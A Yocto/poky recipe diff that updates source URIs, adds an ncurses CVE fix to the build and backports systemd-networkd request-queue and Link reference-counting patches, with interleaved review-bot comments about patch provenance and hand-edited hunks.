100644 --- a/poky/meta/recipes-core/ncurses/ncurses.inc +++ b/poky/meta/recipes-core/ncurses/ncurses.inc @@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \ inherit autotools binconfig-disabled multilib_header pkgconfig # Upstream has useful patches at times at ftp://invisible-island.net/ncurses/ -SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https" +SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master" EXTRA_AUTORECONF = "-I m4" diff --git a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb index 76f0cf97f4..700464f70b 100644 --- a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb +++ b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb 
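Review bot: The `Upstream-Status: Backport [...]` tag in CVE-2021-39537.patch cites a pkgsrc Attic copy of the patch on cvsweb.netbsd.org, not the ncurses commit the fix comes from, although the header names that commit a few lines earlier. Point the tag at the origin, `Upstream-Status: Backport [https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b]`, and keep the NetBSD link as a secondary reference, so that a later audit compares against the upstream change. cvtchar begins and ends outside the hunk, so whether its other escape branches also stop at the terminating NUL cannot be checked from here.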
@@ -3,6 +3,7 @@ require ncurses.inc SRC_URI += "file://0001-tic-hang.patch \ file://0002-configure-reproducible.patch \ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \ + file://CVE-2021-39537.patch \ " # commit id corresponds to the revision in package version SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4" diff --git a/poky/meta/recipes-core/os-release/os-release.bb b/poky/meta/recipes-core/os-release/os-release.bb index a29d678125..33f75e39b8 100644 --- a/poky/meta/recipes-core/os-release/os-release.bb +++ b/poky/meta/recipes-core/os-release/os-release.bb @@ -12,7 +12,9 @@ do_configure[noexec] = "1" # Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME # HOME_URL SUPPORT_URL BUG_REPORT_URL -OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME" +OS_RELEASE_FIELDS = "\ + ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \ +" OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID" ID = "${DISTRO}" diff --git a/poky/meta/recipes-core/psplash/psplash_git.bb b/poky/meta/recipes-core/psplash/psplash_git.bb index 22c71f099b..b2947c2114 100644 --- a/poky/meta/recipes-core/psplash/psplash_git.bb +++ b/poky/meta/recipes-core/psplash/psplash_git.bb @@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962" PV = "0.1+git${SRCPV}" PR = "r15" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://psplash-init \ file://psplash-start.service \ file://psplash-systemd.service \ diff --git a/poky/meta/recipes-core/systemd/systemd.inc b/poky/meta/recipes-core/systemd/systemd.inc index 3165d13f03..8b5260bb0d 100644 --- a/poky/meta/recipes-core/systemd/systemd.inc +++ b/poky/meta/recipes-core/systemd/systemd.inc 
@@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \ SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6" SRCBRANCH = "v244-stable" -SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch new file mode 100644 index 0000000000..86d9b0499a --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch 
@@ -0,0 +1,78 @@ +From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl> +Date: Tue, 1 Sep 2020 12:42:35 +0200 +Subject: [PATCH] basic: pass allocation info for ordered_set_new() and + introduce ordered_set_ensure_put() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/basic/ordered-set.c | 21 +++++++++++++++++++++ + src/basic/ordered-set.h | 18 +++++++----------- + 2 files changed, 28 insertions(+), 11 deletions(-) + +diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c +index 7fdb47e064..fb82c17b5a 100644 +--- a/src/basic/ordered-set.c ++++ b/src/basic/ordered-set.c +@@ -4,6 +4,27 @@ + #include "ordered-set.h" + #include "strv.h" + ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ if (*s) ++ return 0; ++ ++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS); ++ if (!*s) ++ return -ENOMEM; ++ ++ return 0; ++} ++ ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) { ++ int r; ++ ++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS); ++ if (r < 0) ++ return r; ++ ++ return ordered_set_put(*s, p); ++} ++ + int ordered_set_consume(OrderedSet *s, void *p) { + int r; + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a42a57eb49..2c241a808b 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -7,20 +7,16 @@ + + typedef struct OrderedSet OrderedSet; + +-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) { +- return (OrderedSet*) ordered_hashmap_new(ops); ++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS); + } ++#define 
ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS) + +-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) { +- if (*s) +- return 0; ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS) + +- *s = ordered_set_new(ops); +- if (!*s) +- return -ENOMEM; +- +- return 0; +-} ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS) + + static inline OrderedSet* ordered_set_free(OrderedSet *s) { + return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s); diff --git a/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch new file mode 100644 index 0000000000..42b6e05b55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch 
@@ -0,0 +1,35 @@ +From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Mon, 26 Apr 2021 23:52:40 +0900 +Subject: [PATCH] ordered-set: introduce + ordered_set_clear/free_with_destructor() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/basic/ordered-set.h | 11 +++++++++++ + 1 file changed, 11 insertions(+) + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a377f20b1f..64df41766f 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s); + #define ORDERED_SET_FOREACH(e, s, i) \ + for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); ) + ++#define ordered_set_clear_with_destructor(s, f) \ ++ ({ \ ++ OrderedSet *_s = (s); \ ++ void *_item; \ ++ while ((_item = ordered_set_steal_first(_s))) \ ++ f(_item); \ ++ _s; \ ++ }) ++#define ordered_set_free_with_destructor(s, f) \ ++ ordered_set_free(ordered_set_clear_with_destructor(s, f)) ++ + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free); + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free); + diff --git a/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch new file mode 100644 index 0000000000..06c523834d --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch 
@@ -0,0 +1,285 @@ +From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Fri, 7 May 2021 15:39:16 +0900 +Subject: [PATCH] network: add skeleton of request queue + +This will be used in later commits. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/meson.build | 2 + + src/network/networkd-link.c | 20 +++++- + src/network/networkd-manager.c | 7 ++ + src/network/networkd-manager.h | 2 + + src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++ + src/network/networkd-queue.h | 42 ++++++++++++ + 6 files changed, 192 insertions(+), 2 deletions(-) + create mode 100644 src/network/networkd-queue.c + create mode 100644 src/network/networkd-queue.h + +diff --git a/src/network/meson.build b/src/network/meson.build +index 4fca3106dc..a8b9232e64 100644 +--- a/src/network/meson.build ++++ b/src/network/meson.build +@@ -105,6 +105,8 @@ sources = files(''' + networkd-network.h + networkd-nexthop.c + networkd-nexthop.h ++ networkd-queue.c ++ networkd-queue.h + networkd-route.c + networkd-route.h + networkd-routing-policy-rule.c +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 34359b2541..2f33305a27 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -30,6 +30,7 @@ + #include "networkd-manager.h" + #include "networkd-ndisc.h" + #include "networkd-neighbor.h" ++#include "networkd-queue.h" + #include "networkd-radv.h" + #include "networkd-routing-policy-rule.h" + #include "networkd-wifi.h" + +@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for + if (r < 0) + return r; + ++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) { + return r; + } + 
++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c +index 562ce5ca54..fd576169a9 100644 +--- a/src/network/networkd-manager.c ++++ b/src/network/networkd-manager.c +@@ -34,6 +34,7 @@ + #include "networkd-manager-bus.h" + #include "networkd-manager.h" + #include "networkd-network-bus.h" ++#include "networkd-queue.h" + #include "networkd-speed-meter.h" + #include "ordered-set.h" + #include "path-util.h" +@@ -406,6 +407,10 @@ int manager_new(Manager **ret) { + if (r < 0) + return r; + ++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m); ++ if (r < 0) ++ return r; ++ + r = manager_connect_rtnl(m); + if (r < 0) + return r; +@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) { + + free(m->state_file); + ++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free); ++ + while ((a = hashmap_first_key(m->dhcp6_prefixes))) + (void) dhcp6_prefix_remove(m, a); + m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes); +diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h +index 301b97c1a1..26e8802871 100644 +--- a/src/network/networkd-manager.h ++++ b/src/network/networkd-manager.h +@@ -91,6 +91,8 @@ struct Manager { + usec_t speed_meter_usec_old; + + bool dhcp4_prefix_root_cannot_set_table; ++ ++ OrderedSet *request_queue; + }; + + int manager_new(Manager **ret); +diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c +new file mode 100644 +index 0000000000..24bb2c845d +--- /dev/null ++++ b/src/network/networkd-queue.c +@@ -0,0 +1,121 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++ ++#include "networkd-address.h" ++#include "networkd-manager.h" ++#include "networkd-neighbor.h" ++#include "networkd-nexthop.h" ++#include "networkd-route.h" ++#include "networkd-routing-policy-rule.h" ++#include "networkd-queue.h" ++ ++static void request_free_object(RequestType type, void 
*object) { ++ switch(type) { ++ default: ++ assert_not_reached("invalid request type."); ++ } ++} ++ ++Request *request_free(Request *req) { ++ if (!req) ++ return NULL; ++ ++ if (req->on_free) ++ req->on_free(req); ++ if (req->consume_object) ++ request_free_object(req->type, req->object); ++ if (req->link && req->link->manager) ++ ordered_set_remove(req->link->manager->request_queue, req); ++ link_unref(req->link); ++ ++ return mfree(req); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free); ++ ++void request_drop(Request *req) { ++ if (req->message_counter) ++ (*req->message_counter)--; ++ ++ request_free(req); ++} ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret) { ++ ++ _cleanup_(request_freep) Request *req = NULL; ++ int r; ++ ++ assert(link); ++ assert(link->manager); ++ assert(type >= 0 && type < _REQUEST_TYPE_MAX); ++ assert(object); ++ assert(netlink_handler); ++ ++ req = new(Request, 1); ++ if (!req) { ++ if (consume_object) ++ request_free_object(type, object); ++ return -ENOMEM; ++ } ++ ++ *req = (Request) { ++ .link = link, ++ .type = type, ++ .object = object, ++ .consume_object = consume_object, ++ .message_counter = message_counter, ++ .netlink_handler = netlink_handler, ++ }; ++ ++ link_ref(link); ++ ++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req); ++ if (r < 0) ++ return r; ++ ++ if (req->message_counter) ++ (*req->message_counter)++; ++ ++ if (ret) ++ *ret = req; ++ ++ TAKE_PTR(req); ++ return 0; ++} ++ ++int manager_process_requests(sd_event_source *s, void *userdata) { ++ Manager *manager = userdata; ++ int r; ++ ++ assert(manager); ++ ++ for (;;) { ++ bool processed = false; ++ Request *req; ++ Iterator i; ++ ORDERED_SET_FOREACH(req, manager->request_queue, i) { ++ switch(req->type) { ++ default: ++ return -EINVAL; ++ } ++ if (r < 0) ++ 
link_enter_failed(req->link); ++ if (r > 0) { ++ ordered_set_remove(manager->request_queue, req); ++ request_free(req); ++ processed = true; ++ } ++ } ++ ++ if (!processed) ++ break; ++ } ++ ++ return 0; ++} +diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h +new file mode 100644 +index 0000000000..4558ae548f +--- /dev/null ++++ b/src/network/networkd-queue.h +@@ -0,0 +1,42 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++#pragma once ++ ++#include "sd-event.h" ++ ++#include "networkd-link.h" ++ ++typedef struct Request Request; ++ ++typedef int (*request_after_configure_handler_t)(Request*, void*); ++typedef void (*request_on_free_handler_t)(Request*); ++ ++typedef enum RequestType { ++ _REQUEST_TYPE_MAX, ++ _REQUEST_TYPE_INVALID = -EINVAL, ++} RequestType; ++ ++typedef struct Request { ++ Link *link; ++ RequestType type; ++ bool consume_object; ++ void *object; ++ void *userdata; ++ unsigned *message_counter; ++ link_netlink_message_handler_t netlink_handler; ++ request_after_configure_handler_t after_configure; ++ request_on_free_handler_t on_free; ++} Request; ++ ++Request *request_free(Request *req); ++void request_drop(Request *req); ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret); ++ ++int manager_process_requests(sd_event_source *s, void *userdata); diff --git a/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch new file mode 100644 index 0000000000..4c402e7e55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch 
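Review bot: network-add-skeleton-of-request-queue.patch adds calls to `link_drop_requests(link)` in link_reconfigure_internal and link_carrier_lost, but none of its hunks defines that function; the definition is added by network-also-drop-requests-when-link-enters-linger-state.patch. The diffstat still reports 20 changed lines for networkd-link.c while only five insertions are present, and the second networkd-link.c hunk header is offset by more than the one line added before it, which suggests a hunk was removed by hand. Say so in the header, e.g. `Upstream-Status: Backport [<upstream URL>; link_drop_requests() definition dropped, supplied by network-also-drop-requests-when-link-enters-linger-state.patch]`, so nobody applies or reverts one patch without the other.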
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if link is removed, several references to the link in remain
+exist in requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
++static void link_drop_requests(Link *link) {
++ Request *req;
++ Iterator i;
++
++ assert(link);
++ assert(link->manager);
++
++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++ if (req->link == link)
++ request_drop(req);
++}
++
+ void link_drop(Link *link) {
+ if (!link)
+ return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+ /* Drop all references from other links and manager. Note that async netlink calls may have
+ * references to the link, and they will be dropped when we receive replies. */
+
++ link_drop_requests(link);
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+--
+2.17.1
+
diff --git a/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@ +From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Fri, 14 May 2021 15:58:15 +0900 +Subject: [PATCH] network: fix Link reference counter issue + +Previously, when link_new() fails, `link_unref()` was called, so, +`Manager::links` may become dirty. +This introduces `link_drop_or_unref()` and it will be called on +failure. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/networkd-link.c | 240 ++++++++++++++++++------------------ + 1 file changed, 122 insertions(+), 118 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index b56c232eca..d493afda4c 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -540,109 +540,6 @@ static int link_update_flags(Link *link, + return 0; + } + +-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { +- _cleanup_(link_unrefp) Link *link = NULL; +- uint16_t type; +- const char *ifname, *kind = NULL; +- int r, ifindex; +- unsigned short iftype; +- +- assert(manager); +- assert(message); +- assert(ret); +- +- /* check for link kind */ +- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); +- if (r == 0) { +- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind); +- r = sd_netlink_message_exit_container(message); +- if (r < 0) +- return r; +- } +- +- r = sd_netlink_message_get_type(message, &type); +- if (r < 0) +- return r; +- else if (type != RTM_NEWLINK) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_ifindex(message, &ifindex); +- if (r < 0) +- return r; +- else if (ifindex <= 0) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_type(message, &iftype); +- if (r < 0) +- return r; +- +- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname); +- if (r < 
0) +- return r; +- +- link = new(Link, 1); +- if (!link) +- return -ENOMEM; +- +- *link = (Link) { +- .n_ref = 1, +- .manager = manager, +- .state = LINK_STATE_PENDING, +- .ifindex = ifindex, +- .iftype = iftype, +- +- .n_dns = (unsigned) -1, +- .dns_default_route = -1, +- .llmnr = _RESOLVE_SUPPORT_INVALID, +- .mdns = _RESOLVE_SUPPORT_INVALID, +- .dnssec_mode = _DNSSEC_MODE_INVALID, +- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID, +- }; +- +- link->ifname = strdup(ifname); +- if (!link->ifname) +- return -ENOMEM; +- +- if (kind) { +- link->kind = strdup(kind); +- if (!link->kind) +- return -ENOMEM; +- } +- +- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex); +- if (r < 0) +- log_link_debug_errno(link, r, "New device has no master, continuing without"); +- +- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); +- if (r < 0) +- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); +- +- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- r = hashmap_ensure_allocated(&manager->links, NULL); +- if (r < 0) +- return r; +- +- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); +- if (r < 0) +- return r; +- +- r = link_update_flags(link, message, false); +- if (r < 0) +- return r; +- +- *ret = TAKE_PTR(link); +- +- return 0; +-} +- + void link_ntp_settings_clear(Link *link) { + link->ntp = strv_free(link->ntp); + } +@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin + request_drop(req); + } + +-void link_drop(Link *link) { ++Link *link_drop(Link *link) { + if (!link) +- return; ++ return NULL; + + assert(link->manager); + +@@ -2057,7 +1954,7 @@ void link_drop(Link *link) { + + /* 
The following must be called at last. */ + assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); ++ return link_unref(link); + } + + static int link_joined(Link *link) { +@@ -3295,6 +3192,112 @@ ipv4ll_address_fail: + + return 0; + } ++ ++static Link *link_drop_or_unref(Link *link) { ++ if (!link) ++ return NULL; ++ if (!link->manager) ++ return link_unref(link); ++ return link_drop(link); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref); ++ ++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { ++ _cleanup_(link_drop_or_unrefp) Link *link = NULL; ++ uint16_t type; ++ _cleanup_free_ char *ifname = NULL, *kind = NULL; ++ int r, ifindex; ++ unsigned short iftype; ++ ++ assert(manager); ++ assert(message); ++ assert(ret); ++ ++ r = sd_netlink_message_get_type(message, &type); ++ if (r < 0) ++ return r; ++ else if (type != RTM_NEWLINK) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex); ++ if (r < 0) ++ return r; ++ else if (ifindex <= 0) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_type(message, &iftype); ++ if (r < 0) ++ return r; ++ ++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname); ++ if (r < 0) ++ return r; ++ ++ /* check for link kind */ ++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); ++ if (r >= 0) { ++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind); ++ r = sd_netlink_message_exit_container(message); ++ if (r < 0) ++ return r; ++ } ++ ++ link = new(Link, 1); ++ if (!link) ++ return -ENOMEM; ++ ++ *link = (Link) { ++ .n_ref = 1, ++ .state = LINK_STATE_PENDING, ++ .ifindex = ifindex, ++ .iftype = iftype, ++ .ifname = TAKE_PTR(ifname), ++ .kind = TAKE_PTR(kind), ++ ++ .n_dns = (unsigned) -1, ++ .dns_default_route = -1, ++ .llmnr = _RESOLVE_SUPPORT_INVALID, ++ .mdns = _RESOLVE_SUPPORT_INVALID, ++ .dnssec_mode = _DNSSEC_MODE_INVALID, ++ .dns_over_tls_mode = 
_DNS_OVER_TLS_MODE_INVALID, ++ }; ++ ++ r = hashmap_ensure_allocated(&manager->links, NULL); ++ if (r < 0) ++ return r; ++ ++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); ++ if (r < 0) ++ return r; ++ ++ link->manager = manager; ++ ++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex); ++ if (r < 0) ++ log_link_debug_errno(link, r, "New device has no master, continuing without"); ++ ++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); ++ if (r < 0) ++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); ++ ++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ r = link_update_flags(link, message, false); ++ if (r < 0) ++ return r; ++ ++ *ret = TAKE_PTR(link); ++ ++ return 0; ++} + + int link_add(Manager *m, sd_netlink_message *message, Link **ret) { + _cleanup_(sd_device_unrefp) sd_device *device = NULL; + +--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530 ++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530 +@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d + + int link_get(Manager *m, int ifindex, Link **ret); + int link_add(Manager *manager, sd_netlink_message *message, Link **ret); +-void link_drop(Link *link); ++Link *link_drop(Link *link); + + int link_down(Link *link, link_netlink_message_handler_t callback); + + diff --git a/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch new file mode 100644 index 0000000000..65bdc611df --- /dev/null 
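Review bot: The header and the body of network-fix-Link-reference-counter-issue.patch disagree about what is being backported. The diffstat lists only `src/network/networkd-link.c` ("1 file changed"), but the patch ends with a `src/network/networkd-link.h` section that carries local timestamps (`2021-09-02 18:04:16...`) and changes the `link_drop()` prototype to `Link *link_drop(Link *link);`, so the backport appears to have been adapted by hand. Anyone auditing it against the commit named in `Upstream-Status: Backport [...]` needs to know that. I would add a short line under the `Upstream-Status:` trailer saying what was adapted for 244.5 and regenerate the diffstat so it covers both files.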
+++ b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch 
@@ -0,0 +1,67 @@ +From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Mon, 17 May 2021 15:40:15 +0900 +Subject: [PATCH] network: merge link_drop() and link_detach_from_manager() + +link_detach_from_manager() is only called by link_drop(). It is not +necessary to split such tiny function. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/networkd-link.c | 27 ++++++++++++--------------- + 1 file changed, 12 insertions(+), 15 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 9d30e16b0a..67d01ac44d 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) { + link_unref(set_remove(master->slaves, link)); + } + +-static void link_detach_from_manager(Link *link) { +- if (!link || !link->manager) +- return; +- +- link_unref(set_remove(link->manager->links_requesting_uuid, link)); +- link_clean(link); +- +- /* The following must be called at last. */ +- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); +-} +- + void link_drop(Link *link) { +- if (!link || link->state == LINK_STATE_LINGER) ++ if (!link) + return; + ++ assert(link->manager); ++ + link_set_state(link, LINK_STATE_LINGER); + ++ /* Drop all references from other links and manager. Note that async netlink 